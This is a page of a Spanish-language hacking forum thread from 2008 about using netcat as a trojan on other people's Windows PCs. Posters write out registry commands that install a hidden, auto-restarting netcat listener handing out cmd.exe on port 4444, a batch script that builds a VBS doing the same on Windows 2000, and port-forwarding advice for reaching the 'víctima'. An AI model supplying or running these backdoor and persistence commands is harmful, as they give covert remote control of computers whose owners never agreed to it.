elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 299,199 veces)
BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #370 en: 7 Enero 2008, 06:28 am »

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -p 4444 -t -e cmd.exe


ok perfecto ahora para que la ventana no salga cuando inicie le agrege la opcion -d

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -d -p 4444 -t -e cmd.exe

y perfeto no sale ninguna ventana de msdos  ok aqui viene otra pregunta ahora si cierro el programa se cierra tambien tendria que esperar q la persona reiniciara el pc para que se pueda volver a cargar

como podria ponerlo que se ative cada cierto tiempo o algo haci

« Última modificación: 7 Enero 2008, 08:30 am por BBOYHACK » En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #371 en: 7 Enero 2008, 08:58 am »

bueno ya lo pude hacer pero voy a  post aca eso tal ves alguien tenga tambien la duda para que cuando lo cierres se vuelva a cargar otra vez sin tener que reiniciar


REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -L -d  -p 4444 -t -e cmd.exe


si te fijais cambie solo la -l por -L de minuscula la puse en mayuscula...
En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
Enzo87

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Jugando con netcat
« Respuesta #372 en: 7 Enero 2008, 15:45 pm »

BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...

Eso es porque has cambiado el icono a la version 1.1, prueba cambiandoselo a la versión 1.0.
Busca por los primeros post y encontraras este tema solucionado.

Saludos!!
En línea

BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #373 en: 18 Enero 2008, 03:40 am »

amigo a ver si me pueden ayudar. tengo un pc y estoy tratando de agregar el netcat al inicio pero el equipo tiene es windows 2000 y no es el mismo comando que windows xp


con que comando lo puede agregar al inicio en windows 2000
En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #374 en: 18 Enero 2008, 23:34 pm »

En W2K no existe ningun comando que modifique el registro desde consola (ms-dos)

Pero bueno, siempre hay que pensar que si no se encuentra una solución directa, al menos hay que encontrar una alternativa  :)

Como comentaba, windows 2000 no trae el comando REG, pero lo que si trae es Windows Script Host (viene por defecto a partir de win 98 :P)
Para el que no sepa que es esto, le comento que es un lenguaje interpretado que permite crear archivos por lotes (como los bat) más complejo.

Entre sus posibilidades está la de modificar el registro, y al ser interpretado, basta con volcar su codigo en un "archivo de texto", y cambiarle la extensión a *.vbs

Pero bueno, pasando ahora si al problema de BBOYHACK, he aquí el codigo *.bat que crea este *.vbs

Citar
echo set objshel = createobject("wscript.shell") >> c:\registro.vbs
echo objshel.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NC", "C:\nc.exe -L -d  -p 4444 -t -e cmd.exe", "REG_SZ" >> c:\registro.vbs
start c:\registro.vbs

Al visualizarlo en pantalla el codigo queda algo entrecortado (igualmente creo esta bastante claro), así que por las dudas aclaro.

Línea 1 - - - - -> echo set.........
Línea 2 - - - - -> echo objshel...
Linea 3 - - - - -> start ..............

Espero te sirva  ;)

Saludos
« Última modificación: 18 Enero 2008, 23:35 pm por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
D4RIO


Desconectado Desconectado

Mensajes: 1.004


U N I X


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #375 en: 19 Enero 2008, 01:06 am »

O te podes bajar una buena utilidad de consola para la edicion del registro, o programar una xD:::
En línea

OpenBSDFreeBSD
luar123

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: Jugando con netcat
« Respuesta #376 en: 22 Enero 2008, 17:31 pm »

hola mi pregunta es la siguiente: en la parte del troyano donde hay que colocar la ip se debe poner la ip publica o la ip pribada, y si se debe abrir el puerto en el router
espero me puedan despejar estas dudas.
gracias
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #377 en: 22 Enero 2008, 18:13 pm »

Debes de poner al ip pública, y en el router mapear el puerto que hayas configurado, hacía la ip privada/interna.  ;D

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
KalmeniduS

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: Jugando con netcat
« Respuesta #378 en: 28 Enero 2008, 18:52 pm »

hola que tal, exelentemente explicado, pero tengo un problema, en el equipo victima todo bien me da un pantallaso de la consola y crea el archivo en la carpeta update. Pero a la hora de abrir la consola y escrbibir "nc -vv -L -p 80" no hace nada, dice escuchando puerto y queda asi para siempre. si me pudieras decir que hago mal estaria buenisimo. Desde ya gracias
En línea

vitaepe

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Jugando con netcat
« Respuesta #379 en: 28 Enero 2008, 19:08 pm »

Hola gente!! estuve leyendo algunas cosas sobre este tema, las cuales me resultaron interesantes, hasta donde pude observar solo se referian al S.O windows, y como seria jugar con netcat pero en linux en mi caso Ubuntu, solo debo agregar que no deseo que me digan como hacerlo, simplemente como se toman la molestia de explicarlo en windows tambien haganlo en linux, saludos !!  ;D
En línea

Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines